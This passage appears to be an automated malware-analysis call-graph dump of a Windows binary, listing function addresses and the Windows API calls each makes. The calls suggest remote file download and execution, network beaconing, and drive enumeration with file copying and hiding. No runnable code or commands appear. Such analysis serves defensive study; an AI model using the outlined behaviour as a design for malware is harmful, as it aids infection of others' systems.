40a1b0 __aligned_recalloc_base 3 API calls 4625->4628 4626->4624 4630 40a1b0 4626->4630 4628->4623 4637 409e50 GetCurrentProcessId 4630->4637 4632 40a1bb 4633 4025df 4632->4633 4638 40a0f0 4632->4638 4633->4624 4636 40a1d7 HeapFree 4636->4633 4637->4632 4639 40a120 HeapValidate 4638->4639 4640 40a140 4638->4640 4639->4640 4640->4633 4640->4636 4658 40a220 4641->4658 4644 40c861 4644->4430 4647 40a1b0 __aligned_recalloc_base 3 API calls 4647->4644 4871 409fe0 4648->4871 4651 405d2a memcpy 4652 40a220 8 API calls 4651->4652 4653 405d61 4652->4653 4881 40c190 4653->4881 4656 405de8 4656->4430 4659 40a24d 4658->4659 4660 409fa0 _invalid_parameter 7 API calls 4659->4660 4661 40a262 4659->4661 4662 40a264 memcpy 4659->4662 4660->4659 4661->4644 4663 40bd30 4661->4663 4662->4659 4666 40bd3a 4663->4666 4667 40bd71 memcmp 4666->4667 4668 40bd98 4666->4668 4670 40a1b0 __aligned_recalloc_base 3 API calls 4666->4670 4671 40bd59 4666->4671 4672 40c220 4666->4672 4686 407af0 4666->4686 4667->4666 4669 40a1b0 __aligned_recalloc_base 3 API calls 4668->4669 4669->4671 4670->4666 4671->4644 4671->4647 4673 40c22f _invalid_parameter 4672->4673 4674 409fa0 _invalid_parameter 7 API calls 4673->4674 4676 40c239 4673->4676 4675 40c2c8 4674->4675 4675->4676 4677 402420 7 API calls 4675->4677 4676->4666 4678 40c2dd 4677->4678 4679 402420 7 API calls 4678->4679 4680 40c2e5 4679->4680 4682 40c33d _invalid_parameter 4680->4682 4689 40c390 4680->4689 4694 402470 4682->4694 4685 402470 3 API calls 4685->4676 4802 409d10 4686->4802 4690 4024e0 10 API calls 4689->4690 4691 40c3a4 4690->4691 4700 4026f0 4691->4700 4693 40c3bc 4693->4680 4695 4024ce 4694->4695 4698 402484 _invalid_parameter 4694->4698 4695->4685 4696 4024ac 4697 40a1b0 __aligned_recalloc_base 3 API calls 4696->4697 4697->4695 4698->4696 4699 40a1b0 __aligned_recalloc_base 3 API calls 4698->4699 4699->4696 4703 402710 4700->4703 4702 40270a 4702->4693 4704 402724 4703->4704 4705 402540 __aligned_recalloc_base 10 API calls 4704->4705 4706 40276d 4705->4706 4707 402540 __aligned_recalloc_base 10 API calls 4706->4707 4708 40277d 4707->4708 4709 402540 __aligned_recalloc_base 10 API calls 4708->4709 4710 40278d 4709->4710 4711 402540 __aligned_recalloc_base 10 API calls 4710->4711 4712 40279d 4711->4712 4713 4027a6 4712->4713 4714 4027cf 4712->4714 4718 403e20 4713->4718 4735 403df0 4714->4735 4717 4027c7 __aligned_recalloc_base 4717->4702 4719 402820 _invalid_parameter 7 API calls 4718->4719 4720 403e37 4719->4720 4721 402820 _invalid_parameter 7 API calls 4720->4721 4722 403e46 4721->4722 4723 402820 _invalid_parameter 7 API calls 4722->4723 4724 403e55 4723->4724 4725 402820 _invalid_parameter 7 API calls 4724->4725 4734 403e64 _invalid_parameter __aligned_recalloc_base 4725->4734 4727 40400f _invalid_parameter 4728 402850 _invalid_parameter 3 API calls 4727->4728 4729 404035 _invalid_parameter 4727->4729 4728->4727 4730 402850 _invalid_parameter 3 API calls 4729->4730 4731 40405b _invalid_parameter 4729->4731 4730->4729 4732 402850 _invalid_parameter 3 API calls 4731->4732 4733 404081 4731->4733 4732->4731 4733->4717 4734->4727 4738 402850 4734->4738 4742 404090 4735->4742 4737 403e0c 4737->4717 4739 402866 4738->4739 4740 40285b 4738->4740 4739->4734 4741 40a1b0 __aligned_recalloc_base 3 API calls 4740->4741 4741->4739 4743 4040a6 _invalid_parameter 4742->4743 4744 4040b8 _invalid_parameter 4743->4744 4745 4040dd 4743->4745 4747 404103 4743->4747 4744->4737 4772 403ca0 4745->4772 4748 40413d 4747->4748 4749 40415e 4747->4749 4782 404680 4748->4782 4751 402820 _invalid_parameter 7 API calls 4749->4751 4752 40416f 4751->4752 4753 402820 _invalid_parameter 7 API calls 4752->4753 4754 40417e 4753->4754 4755 402820 _invalid_parameter 7 API calls 4754->4755 4756 40418d 4755->4756 4757 402820 _invalid_parameter 7 API calls 4756->4757 4758 40419c 4757->4758 4795 403d70 4758->4795 4760 402820 _invalid_parameter 7 API calls 4761 4041ca _invalid_parameter 4760->4761 4761->4760 4762 404284 _invalid_parameter __aligned_recalloc_base 4761->4762 4763 402850 _invalid_parameter 3 API calls 4762->4763 4764 4045a3 _invalid_parameter 4762->4764 4763->4762 4765 402850 _invalid_parameter 3 API calls 4764->4765 4766 4045c9 _invalid_parameter 4764->4766 4765->4764 4767 402850 _invalid_parameter 3 API calls 4766->4767 4768 4045ef _invalid_parameter 4766->4768 4767->4766 4769 402850 _invalid_parameter 3 API calls 4768->4769 4770 404615 _invalid_parameter 4768->4770 4769->4768 4770->4744 4771 402850 _invalid_parameter 3 API calls 4770->4771 4771->4770 4773 403cae 4772->4773 4774 402820 _invalid_parameter 7 API calls 4773->4774 4775 403ccb 4774->4775 4776 402820 _invalid_parameter 7 API calls 4775->4776 4777 403cda _invalid_parameter 4776->4777 4778 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4777->4778 4779 403d3a _invalid_parameter 4777->4779 4778->4777 4780 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4779->4780 4781 403d60 4779->4781 4780->4779 4781->4744 4783 402820 _invalid_parameter 7 API calls 4782->4783 4784 404697 4783->4784 4785 402820 _invalid_parameter 7 API calls 4784->4785 4786 4046a6 4785->4786 4787 402820 _invalid_parameter 7 API calls 4786->4787 4788 4046b5 _invalid_parameter __aligned_recalloc_base 4787->4788 4789 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4788->4789 4790 404841 _invalid_parameter 4788->4790 4789->4788 4791 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4790->4791 4792 404867 _invalid_parameter 4790->4792 4791->4790 4793 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4792->4793 4794 40488d 4792->4794 4793->4792 4794->4744 4796 402820 _invalid_parameter 7 API calls 4795->4796 4797 403d7f _invalid_parameter 4796->4797 4798 403ca0 _invalid_parameter 9 API calls 4797->4798 4799 403db8 _invalid_parameter 4798->4799 4800 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4799->4800 4801 403de3 4799->4801 4800->4799 4801->4761 4803 409d22 4802->4803 4806 409c70 4803->4806 4807 409fa0 _invalid_parameter 7 API calls 4806->4807 4812 409c80 4807->4812 4808 407b0f 4808->4666 4810 409cbc 4813 40a1b0 __aligned_recalloc_base 3 API calls 4810->4813 4812->4808 4812->4810 4815 4091a0 4812->4815 4822 409790 4812->4822 4827 409b60 4812->4827 4813->4808 4816 4091b3 4815->4816 4821 4091a9 4815->4821 4817 4091f6 memset 4816->4817 4816->4821 4818 409217 4817->4818 4817->4821 4819 40921d memcpy 4818->4819 4818->4821 4835 408f70 4819->4835 4821->4812 4823 40979d 4822->4823 4824 4097a7 4822->4824 4823->4812 4824->4823 4825 40989f memcpy 4824->4825 4840 4094c0 4824->4840 4825->4824 4828 409b6c 4827->4828 4831 409b76 4827->4831 4828->4812 4829 4094c0 64 API calls 4830 409bf7 4829->4830 4830->4828 4832 408f70 6 API calls 4830->4832 4831->4828 4831->4829 4833 409c16 4832->4833 4833->4828 4834 409c2b memcpy 4833->4834 4834->4828 4836 408fbe 4835->4836 4838 408f7e 4835->4838 4836->4821 4838->4836 4839 408eb0 6 API calls 4838->4839 4839->4838 4841 4094d0 4840->4841 4843 4094da 4840->4843 4841->4824 4843->4841 4850 409300 4843->4850 4845 409618 memcpy 4845->4841 4847 409637 memcpy 4848 409761 4847->4848 4849 4094c0 62 API calls 4848->4849 4849->4841 4851 40930d 4850->4851 4852 409317 4850->4852 4851->4841 4851->4845 4851->4847 4852->4851 4853 4093a0 4852->4853 4854 4093a5 4852->4854 4855 409388 4852->4855 4861 408c60 4853->4861 4858 408f70 6 API calls 4854->4858 4857 408f70 6 API calls 4855->4857 4857->4853 4858->4853 4860 40944c memset 4860->4851 4862 408c6f 4861->4862 4863 408c79 4861->4863 4862->4851 4862->4860 4863->4862 4864 408b30 9 API calls 4863->4864 4865 408d72 4864->4865 4866 409fa0 _invalid_parameter 7 API calls 4865->4866 4867 408dc1 4866->4867 4867->4862 4868 4089a0 46 API calls 4867->4868 4869 408dee 4868->4869 4870 40a1b0 __aligned_recalloc_base GetCurrentProcessId HeapValidate HeapFree 4869->4870 4870->4862 4890 409e50 GetCurrentProcessId 4871->4890 4873 409feb 4874 409e70 _invalid_parameter 5 API calls 4873->4874 4878 409ff7 _invalid_parameter 4873->4878 4874->4878 4875 40a0f0 __aligned_recalloc_base HeapValidate 4875->4878 4876 40a0a0 HeapAlloc 4876->4878 4877 40a06a HeapReAlloc 4877->4878 4878->4875 4878->4876 4878->4877 4879 40a1b0 __aligned_recalloc_base 3 API calls 4878->4879 4880 405d15 4878->4880 4879->4878 4880->4651 4880->4656 4883 40c19b 4881->4883 4882 409fa0 _invalid_parameter 7 API calls 4882->4883 4883->4882 4884 405dad 4883->4884 4884->4656 4885 407310 4884->4885 4886 409fa0 _invalid_parameter 7 API calls 4885->4886 4887 407320 4886->4887 4888 407367 4887->4888 4889 40732c memcpy CreateThread 4887->4889 4888->4656 4889->4888 4891 407370 GetTickCount srand rand Sleep 4889->4891 4890->4873 4892 4073a7 4891->4892 4893 4073fd 4891->4893 4896 4073b6 StrChrA 4892->4896 4897 4073fb 4892->4897 4901 40eae0 9 API calls 4892->4901 4894 40eae0 56 API calls 4893->4894 4893->4897 4894->4897 4895 40a1b0 __aligned_recalloc_base 3 API calls 4898 407428 4895->4898 4896->4892 4897->4895 4902 40ed03 InternetCloseHandle Sleep 4901->4902 4903 40eba3 InternetOpenUrlW 4901->4903 4906 40ed2a 6 API calls 4902->4906 4923 4073e5 Sleep 4902->4923 4904 40ebd2 CreateFileW 4903->4904 4905 40ecf6 InternetCloseHandle 4903->4905 4908 40ec01 InternetReadFile 4904->4908 4927 40ecd3 4904->4927 4905->4902 4907 40eda6 wsprintfW DeleteFileW 4906->4907 4906->4923 4909 40e7c0 18 API calls 4907->4909 4910 40ec54 wsprintfW DeleteFileW 4908->4910 4911 40ec25 4908->4911 4912 40eddb 4909->4912 4929 40e7c0 CreateFileW 4910->4929 4911->4910 4913 40ec2e WriteFile 4911->4913 4915 40ede5 Sleep 4912->4915 4916 40ee19 DeleteFileW 4912->4916 4913->4908 4918 40e980 6 API calls 4915->4918 4916->4923 4920 40edfc 4918->4920 4920->4923 4925 40ee0f ExitProcess 4920->4925 4921 40eca0 Sleep 4924 40e980 6 API calls 4921->4924 4922 40ecdc DeleteFileW 4922->4927 4923->4892 4926 40ecb7 4924->4926 4926->4927 4928 40eccb ExitProcess 4926->4928 4927->4905 4930 40e805 CreateFileMappingW 4929->4930 4931 40e906 4929->4931 4930->4931 4932 40e826 MapViewOfFile 4930->4932 4933 40e920 CreateFileW 4931->4933 4941 40e971 4931->4941 4932->4931 4934 40e845 GetFileSize 4932->4934 4935 40e942 WriteFile 4933->4935 4936 40e968 4933->4936 4937 40e861 4934->4937 4938 40e8fc UnmapViewOfFile 4934->4938 4935->4936 4939 40a1b0 __aligned_recalloc_base 3 API calls 4936->4939 4949 40c7f0 4937->4949 4938->4931 4939->4941 4941->4921 4941->4922 4943 40c190 7 API calls 4944 40e8b0 4943->4944 4944->4938 4945 40e8cd memcmp 4944->4945 4945->4938 4946 40e8e9 4945->4946 4947 40a1b0 __aligned_recalloc_base 3 API calls 4946->4947 4948 40e8f2 4947->4948 4948->4938 4950 40c220 10 API calls 4949->4950 4951 40c814 4950->4951 4951->4938 4951->4943 4953 40d73d htons inet_addr setsockopt 4952->4953 4958 40d86e 4952->4958 4954 40aa80 8 API calls 4953->4954 4955 40d7b6 bind lstrlenA sendto ioctlsocket 4954->4955 4961 40d80b 4955->4961 4958->4437 4959 40d832 5009 40ab40 shutdown closesocket 4959->5009 4960 409fe0 9 API calls 4960->4961 4961->4959 4961->4960 5000 40d890 4961->5000 5016 40dbc0 memset InternetCrackUrlA InternetOpenA 4962->5016 4966 40a1b0 __aligned_recalloc_base 3 API calls 4967 40da9e 4966->4967 4967->4437 4968 40da6b 4968->4966 4974 40da61 SysFreeString 4974->4968 5123 40aa40 inet_addr 4977->5123 4980 40ab2d 4985 40e470 4980->4985 4981 40aadc connect 4982 40aaf0 getsockname 4981->4982 4983 40ab24 4981->4983 4982->4983 5126 40ab40 shutdown closesocket 4983->5126 5127 40aa20 inet_ntoa 4985->5127 4987 40e486 4988 40c9f0 11 API calls 4987->4988 4989 40e4a5 4988->4989 4990 40d6cc 4989->4990 5128 40e4f0 memset InternetCrackUrlA InternetOpenA 4989->5128 4990->4445 4993 40e4dc 4995 40a1b0 __aligned_recalloc_base 3 API calls 4993->4995 4994 40a1b0 __aligned_recalloc_base 3 API calls 4994->4993 4995->4990 4999 40a2d4 4996->4999 4997 40a2da 4997->4436 4998 40a1b0 GetCurrentProcessId HeapValidate HeapFree __aligned_recalloc_base 4998->4999 4999->4997 4999->4998 5005 40d8ac 5000->5005 5001 40d974 5001->4961 5002 40d8c8 recvfrom 5003 40d8f6 StrCmpNIA 5002->5003 5004 40d8e9 Sleep 5002->5004 5003->5005 5006 40d915 StrStrIA 5003->5006 5004->5005 5005->5001 5005->5002 5006->5005 5007 40d936 StrChrA 5006->5007 5010 40c8a0 5007->5010 5009->4958 5011 40c8ab 5010->5011 5012 40c8b1 lstrlenA 5011->5012 5013 409fa0 _invalid_parameter 7 API calls 5011->5013 5014 40c8e0 memcpy 5011->5014 5015 40c8c4 5011->5015 5012->5011 5012->5015 5013->5011 5014->5011 5014->5015 5015->5005 5017 40dc61 InternetConnectA 5016->5017 5018 40d99a 5016->5018 5019 40ddca InternetCloseHandle 5017->5019 5020 40dc9a HttpOpenRequestA 5017->5020 5018->4967 5029 40dab0 5018->5029 5019->5018 5021 40dcd0 HttpSendRequestA 5020->5021 5022 40ddbd InternetCloseHandle 5020->5022 5023 40ddb0 InternetCloseHandle 5021->5023 5025 40dced 5021->5025 5022->5019 5023->5022 5024 40dd0e InternetReadFile 5024->5025 5026 40dd3b 5024->5026 5025->5024 5025->5026 5027 409fe0 9 API calls 5025->5027 5026->5023 5028 40dd56 memcpy 5027->5028 5028->5025 5058 405690 5029->5058 5032 40d9b3 5032->4968 5039 40e420 5032->5039 5033 40dada SysAllocString 5034 40daf1 CoCreateInstance 5033->5034 5035 40dba7 5033->5035 5036 40db9d SysFreeString 5034->5036 5038 40db16 5034->5038 5037 40a1b0 __aligned_recalloc_base 3 API calls 5035->5037 5036->5035 5037->5032 5038->5036 5075 40df70 5039->5075 5042 40ddf0 5080 40e240 5042->5080 5047 40e3a0 6 API calls 5048 40de47 5047->5048 5054 40da32 5048->5054 5097 40e060 5048->5097 5051 40de7f 5051->5054 5102 40df10 5051->5102 5052 40e060 6 API calls 5052->5051 5054->4974 5055 40c9f0 5054->5055 5118 40c960 5055->5118 5063 40569d 5058->5063 5059 4056a3 lstrlenA 5059->5063 5064 4056b6 5059->5064 5061 409fa0 _invalid_parameter 7 API calls 5061->5063 5063->5059 5063->5061 5063->5064 5065 40a1b0 __aligned_recalloc_base 3 API calls 5063->5065 5066 405630 5063->5066 5070 4055e0 5063->5070 5064->5032 5064->5033 5065->5063 5067 405647 MultiByteToWideChar 5066->5067 5068 40563a lstrlenA 5066->5068 5069 40566c 5067->5069 5068->5067 5069->5063 5073 4055eb 5070->5073 5071 4055f1 lstrlenA 5071->5073 5072 405630 2 API calls 5072->5073 5073->5071 5073->5072 5074 405627 5073->5074 5074->5063 5078 40df96 5075->5078 5076 40da1d 5076->4968 5076->5042 5077 40e013 lstrcmpiW 5077->5078 5079 40e02b SysFreeString 5077->5079 5078->5076 5078->5077 5078->5079 5079->5078 5082 40e266 5080->5082 5081 40de0b 5081->5054 5092 40e3a0 5081->5092 5082->5081 5083 40e2f3 lstrcmpiW 5082->5083 5084 40e373 SysFreeString 5083->5084 5085 40e306 5083->5085 5084->5081 5086 40df10 2 API calls 5085->5086 5087 40e314 5086->5087 5087->5084 5088 40e365 5087->5088 5089 40e343 lstrcmpiW 5087->5089 5088->5084 5090 40e355 5089->5090 5091 40e35b SysFreeString 5089->5091 5090->5091 5091->5088 5093 40df10 2 API calls 5092->5093 5095 40e3bb 5093->5095 5094 40de29 5094->5047 5094->5054 5095->5094 5096 40e240 6 API calls 5095->5096 5096->5094 5098 40df10 2 API calls 5097->5098 5100 40e07b 5098->5100 5099 40de65 5099->5051 5099->5052 5100->5099 5106 40e0e0 5100->5106 5103 40df36 5102->5103 5104 40df70 2 API calls 5103->5104 5105 40df4d 5103->5105 5104->5105 5105->5054 5107 40e106 5106->5107 5108 40e21d 5107->5108 5109 40e193 lstrcmpiW 5107->5109 5108->5099 5110 40e213 SysFreeString 5109->5110 5111 40e1a6 5109->5111 5110->5108 5112 40df10 2 API calls 5111->5112 5114 40e1b4 5112->5114 5113 40e205 5113->5110 5114->5110 5114->5113 5115 40e1e3 lstrcmpiW 5114->5115 5116 40e1f5 5115->5116 5117 40e1fb SysFreeString 5115->5117 5116->5117 5117->5113 5120 40c96d 5118->5120 5119 40c910 _vscprintf wvsprintfA 5119->5120 5120->5119 5121 409fe0 9 API calls 5120->5121 5122 40c988 SysFreeString 5120->5122 5121->5120 5122->4974 5124 40aa6c socket 5123->5124 5125 40aa59 gethostbyname 5123->5125 5124->4980 5124->4981 5125->5124 5126->4980 5127->4987 5129 40e4c7 5128->5129 5130 40e594 InternetConnectA 5128->5130 5129->4993 5129->4994 5131 40e714 InternetCloseHandle 5130->5131 5132 40e5cd HttpOpenRequestA 5130->5132 5131->5129 5133 40e603 HttpAddRequestHeadersA HttpSendRequestA 5132->5133 5134 40e707 InternetCloseHandle 5132->5134 5135 40e6fa InternetCloseHandle 5133->5135 5138 40e64d 5133->5138 5134->5131 5135->5134 5136 40e664 InternetReadFile 5137 40e691 5136->5137 5136->5138 5137->5135 5138->5136 5138->5137 5139 409fe0 9 API calls 5138->5139 5140 40e6ac memcpy 5139->5140 5140->5138 5146 407067 5141->5146 5142 40723b 5144 407244 SysFreeString 5142->5144 5145 40700b SysFreeString 5142->5145 5143 40a1b0 __aligned_recalloc_base 3 API calls 5143->5142 5144->5145 5145->4449 5147 4072c0 CoCreateInstance 5146->5147 5148 4071b6 SysAllocString 5146->5148 5149 407082 5146->5149 5147->5146 5148->5146 5148->5149 5149->5142 5149->5143 5151 40beca 5150->5151 5152 40bece 5150->5152 5151->4455 5154 40be80 CryptAcquireContextW 5152->5154 5155 40bebb 5154->5155 5156 40be9d CryptGenRandom CryptReleaseContext 5154->5156 5155->5151 5156->5155 5157->4471 5209 40add0 gethostname 5158->5209 5161 40aeb9 5161->4471 5163 40aecc strcmp 5163->5161 5164 40aee1 5163->5164 5213 40aa20 inet_ntoa 5164->5213 5166 40aeef strstr 5167 40af40 5166->5167 5168 40aeff 5166->5168 5216 40aa20 inet_ntoa 5167->5216 5214 40aa20 inet_ntoa 5168->5214 5171 40af0d strstr 5171->5161 5173 40af1d 5171->5173 5172 40af4e strstr 5174 40af5e 5172->5174 5175 40af9f 5172->5175 5215 40aa20 inet_ntoa 5173->5215 5217 40aa20 inet_ntoa 5174->5217 5219 40aa20 inet_ntoa 5175->5219 5179 40af6c strstr 5179->5161 5182 40af7c 5179->5182 5180 40afad strstr 5183 40afbd 5180->5183 5184 40affe EnterCriticalSection 5180->5184 5181 40af2b strstr 5181->5161 5181->5167 5218 40aa20 inet_ntoa 5182->5218 5220 40aa20 inet_ntoa 5183->5220 5185 40b016 5184->5185 5194 40b041 5185->5194 5222 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 5185->5222 5188 40af8a strstr 5188->5161 5188->5175 5189 40afcb strstr 5189->5161 5190 40afdb 5189->5190 5221 40aa20 inet_ntoa 5190->5221 5193 40b13a LeaveCriticalSection 5193->5161 5194->5193 5196 409d90 7 API calls 5194->5196 5195 40afe9 strstr 5195->5161 5195->5184 5197 40b085 5196->5197 5197->5193 5223 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 5197->5223 5199 40b0a3 5200 40b0d0 5199->5200 5201 40b0c6 Sleep 5199->5201 5203 40b0f5 5199->5203 5202 40a1b0 __aligned_recalloc_base 3 API calls 5200->5202 5201->5199 5202->5203 5203->5193 5224 40ab80 5203->5224 5205->4481 5207 40ab80 13 API calls 5206->5207 5208 40ab73 LeaveCriticalSection 5207->5208 5208->4476 5210 40adf7 gethostbyname 5209->5210 5211 40ae13 5209->5211 5210->5211 5211->5161 5212 40aa20 inet_ntoa 5211->5212 5212->5163 5213->5166 5214->5171 5215->5181 5216->5172 5217->5179 5218->5188 5219->5180 5220->5189 5221->5195 5222->5194 5223->5199 5225 40ab94 5224->5225 5232 40ab8f 5224->5232 5226 409fa0 _invalid_parameter 7 API calls 5225->5226 5228 40aba8 5226->5228 5227 40ac04 CreateFileW 5229 40ac53 InterlockedExchange 5227->5229 5230 40ac27 WriteFile FlushFileBuffers 5227->5230 5228->5227 5228->5232 5231 40a1b0 __aligned_recalloc_base 3 API calls 5229->5231 5230->5229 5231->5232 5232->5193 5234 40d25d 5233->5234 5235 40d193 5234->5235 5236 40d281 WaitForSingleObject 5234->5236 5235->4488 5235->4489 5236->5234 5242 407490 5237->5242 5238 4074b8 Sleep 5238->5242 5239 40756a Sleep 5239->5242 5240 4074e7 Sleep wsprintfA DeleteUrlCacheEntry 5267 40ea30 InternetOpenA 5240->5267 5242->5238 5242->5239 5242->5240 5243 40eae0 56 API calls 5242->5243 5243->5242 5245 405889 memset GetModuleHandleW 5244->5245 5246 4058c2 Sleep GetTickCount GetTickCount wsprintfW RegisterClassExW 5245->5246 5246->5246 5247 405900 CreateWindowExW 5246->5247 5248 40592b 5247->5248 5249 40592d GetMessageA 5247->5249 5250 40595f ExitThread 5248->5250 5251 405941 TranslateMessage DispatchMessageA 5249->5251 5252 405957 5249->5252 5251->5249 5252->5245 5252->5250 5274 40e770 CreateFileW 5253->5274 5255 406d48 ExitThread 5257 406bf0 5257->5255 5258 406d38 Sleep 5257->5258 5259 406c29 5257->5259 5277 4063a0 GetLogicalDrives 5257->5277 5258->5257 5283 4062c0 5259->5283 5262 406c60 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW 5263 406cd6 wsprintfW 5262->5263 5264 406ceb wsprintfW 5262->5264 5263->5264 5289 4066b0 _chkstk 5264->5289 5266 406c5b 5268 40ea56 InternetOpenUrlA 5267->5268 5269 40eac8 Sleep 5267->5269 5270 40ea75 HttpQueryInfoA 5268->5270 5271 40eabe InternetCloseHandle 5268->5271 5269->5242 5272 40eab4 InternetCloseHandle 5270->5272 5273 40ea9e 5270->5273 5271->5269 5272->5271 5273->5272 5275 40e7b8 5274->5275 5276 40e79f GetFileSize 5274->5276 5275->5257 5276->5275 5282 4063cd 5277->5282 5278 406446 5278->5257 5279 4063dc RegOpenKeyExW 5280 4063fe RegQueryValueExW 5279->5280 5279->5282 5281 40643a RegCloseKey 5280->5281 5280->5282 5281->5282 5282->5278 5282->5279 5282->5281 5284 406319 5283->5284 5285 4062dc 5283->5285 5284->5262 5284->5266 5326 406320 GetDriveTypeW 5285->5326 5288 40630b lstrcpyW 5288->5284 5290 4066ce 6 API calls 5289->5290 5302 4066c7 5289->5302 5291 406782 5290->5291 5292 4067c4 PathFileExistsW 5290->5292 5295 40e770 2 API calls 5291->5295 5293 406874 PathFileExistsW 5292->5293 5294 4067d9 PathFileExistsW 5292->5294 5298 406885 5293->5298 5299 4068ca FindFirstFileW 5293->5299 5296 406809 PathFileExistsW 5294->5296 5297 4067ea SetFileAttributesW DeleteFileW 5294->5297 5300 40678e 5295->5300 5303 40681a CreateDirectoryW 5296->5303 5304 40683c PathFileExistsW 5296->5304 5297->5296 5305 4068a5 5298->5305 5306 40688d 5298->5306 5299->5302 5324 4068f1 5299->5324 5300->5292 5301 4067a5 SetFileAttributesW DeleteFileW 5300->5301 5301->5292 5302->5266 5303->5304 5309 40682d SetFileAttributesW 5303->5309 5304->5293 5310 40684d CopyFileW 5304->5310 5307 406460 3 API calls 5305->5307 5331 406460 CoInitialize CoCreateInstance 5306->5331 5312 4068a0 SetFileAttributesW 5307->5312 5308 4069b3 lstrcmpW 5313 4069c9 lstrcmpW 5308->5313 5308->5324 5309->5304 5310->5293 5314 406865 SetFileAttributesW 5310->5314 5312->5299 5313->5324 5314->5293 5316 406b8a FindNextFileW 5316->5308 5317 406ba6 FindClose 5316->5317 5317->5302 5318 406a0f lstrcmpiW 5318->5324 5319 406a76 PathMatchSpecW 5321 406a97 wsprintfW SetFileAttributesW DeleteFileW 5319->5321 5319->5324 5320 406af4 PathFileExistsW 5322 406b0a wsprintfW wsprintfW 5320->5322 5320->5324 5321->5324 5323 406b74 MoveFileExW 5322->5323 5322->5324 5323->5316 5324->5308 5324->5316 5324->5318 5324->5319 5324->5320 5335 406570 CreateDirectoryW wsprintfW FindFirstFileW 5324->5335 5327 4062ff 5326->5327 5328 406348 5326->5328 5327->5284 5327->5288 5328->5327 5329 40635c QueryDosDeviceW 5328->5329 5329->5327 5330 406376 StrCmpNW 5329->5330 5330->5327 5332 406496 5331->5332 5334 4064d2 5331->5334 5333 4064a0 wsprintfW 5332->5333 5332->5334 5333->5334 5334->5312 5336 4065c5 lstrcmpW 5335->5336 5337 40669f 5335->5337 5338 4065f1 5336->5338 5339 4065db lstrcmpW 5336->5339 5337->5324 5341 40666c FindNextFileW 5338->5341 5339->5338 5340 4065f3 wsprintfW wsprintfW 5339->5340 5340->5338 5342 406656 MoveFileExW 5340->5342 5341->5336 5343 406688 FindClose RemoveDirectoryW 5341->5343 5342->5341 5343->5337 5353 40d0d0 5358 401b60 5353->5358 5355 40d0e5 5356 40d104 5355->5356 5357 401b60 16 API calls 5355->5357 5357->5356 5359 401c42 5358->5359 5360 401b70 5358->5360 5359->5355 5360->5359 5361 409d90 7 API calls 5360->5361 5362 401b9d 5361->5362 5362->5359 5363 40a220 8 API calls 5362->5363 5364 401bc9 5363->5364 5365 401be6 5364->5365 5366 401bd6 5364->5366 5378 401ae0 WSASend 5365->5378 5368 40a1b0 __aligned_recalloc_base 3 API calls 5366->5368 5369 401bdc 5368->5369 5369->5355 5370 401bf3 5371 401c33 5370->5371 5372 401bfc EnterCriticalSection 5370->5372 5375 40a1b0 __aligned_recalloc_base 3 API calls 5371->5375 5373 401c13 5372->5373 5374 401c1f LeaveCriticalSection 5372->5374 5373->5374 5374->5355 5376 401c3c 5375->5376 5377 40a1b0 __aligned_recalloc_base 3 API calls 5376->5377 5377->5359 5379 401b50 5378->5379 5380 401b12 WSAGetLastError 5378->5380 5379->5370 5380->5379 5381 401b1f 5380->5381 5382 401b56 5381->5382 5383 401b26 Sleep WSASend 5381->5383 5382->5370 5383->5379 5383->5380 5384 40d4d0 5387 40b570 5384->5387 5395 40b581 5387->5395 5389 40b59f 5391 40a1b0 __aligned_recalloc_base 3 API calls 5389->5391 5392 40b94f 5391->5392 5393 40b960 21 API calls 5393->5395 5395->5389 5395->5393 5397 40b520 13 API calls 5395->5397 5398 40ae80 31 API calls 5395->5398 5401 40bab0 5395->5401 5408 40b250 EnterCriticalSection 5395->5408 5413 406e90 5395->5413 5418 406f30 5395->5418 5423 406d60 5395->5423 5430 406e60 5395->5430 5397->5395 5398->5395 5402 40bac1 lstrlenA 5401->5402 5403 40c190 7 API calls 5402->5403 5407 40badf 5403->5407 5404 40baeb 5405 40bb6f 5404->5405 5406 40a1b0 __aligned_recalloc_base 3 API calls 5404->5406 5405->5395 5406->5405 5407->5402 5407->5404 5409 40b268 5408->5409 5410 40b2a4 LeaveCriticalSection 5409->5410 5433 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 5409->5433 5410->5395 5412 40b293 5412->5410 5434 406ed0 5413->5434 5416 40d160 16 API calls 5417 406ec9 5416->5417 5417->5395 5419 406ed0 75 API calls 5418->5419 5420 406f4f 5419->5420 5421 406f7c 5420->5421 5449 406f90 5420->5449 5421->5395 5460 405fa0 EnterCriticalSection 5423->5460 5425 406dad 5425->5395 5426 406d7a 5426->5425 5465 406dc0 5426->5465 5429 40a1b0 __aligned_recalloc_base 3 API calls 5429->5425 5472 406060 EnterCriticalSection 5430->5472 5432 406e82 5432->5395 5433->5412 5435 406ee3 5434->5435 5437 406ea4 5435->5437 5438 405eb0 EnterCriticalSection 5435->5438 5437->5416 5437->5417 5439 40c820 71 API calls 5438->5439 5440 405ece 5439->5440 5441 405f8b LeaveCriticalSection 5440->5441 5442 405ee7 5440->5442 5444 405f08 5440->5444 5441->5435 5443 405ef1 memcpy 5442->5443 5448 405f06 5442->5448 5443->5448 5447 405f66 memcpy 5444->5447 5444->5448 5445 40a1b0 __aligned_recalloc_base 3 API calls 5446 405f88 5445->5446 5446->5441 5447->5448 5448->5445 5452 40b480 5449->5452 5453 40bf00 3 API calls 5452->5453 5454 40b48b 5453->5454 5455 40b4a7 lstrlenA 5454->5455 5456 40c190 7 API calls 5455->5456 5458 40b4dd 5456->5458 5457 406fd5 5457->5421 5458->5457 5459 40a1b0 __aligned_recalloc_base 3 API calls 5458->5459 5459->5457 5461 405fbe 5460->5461 5462 40604a LeaveCriticalSection 5461->5462 5463 40a220 8 API calls 5461->5463 5462->5426 5464 40601c 5463->5464 5464->5462 5466 409fa0 _invalid_parameter 7 API calls 5465->5466 5467 406dd2 memcpy 5466->5467 5468 40b480 13 API calls 5467->5468 5469 406e3c 5468->5469 5470 40a1b0 __aligned_recalloc_base 3 API calls 5469->5470 5471 406da1 5470->5471 5471->5429 5497 40c880 5472->5497 5475 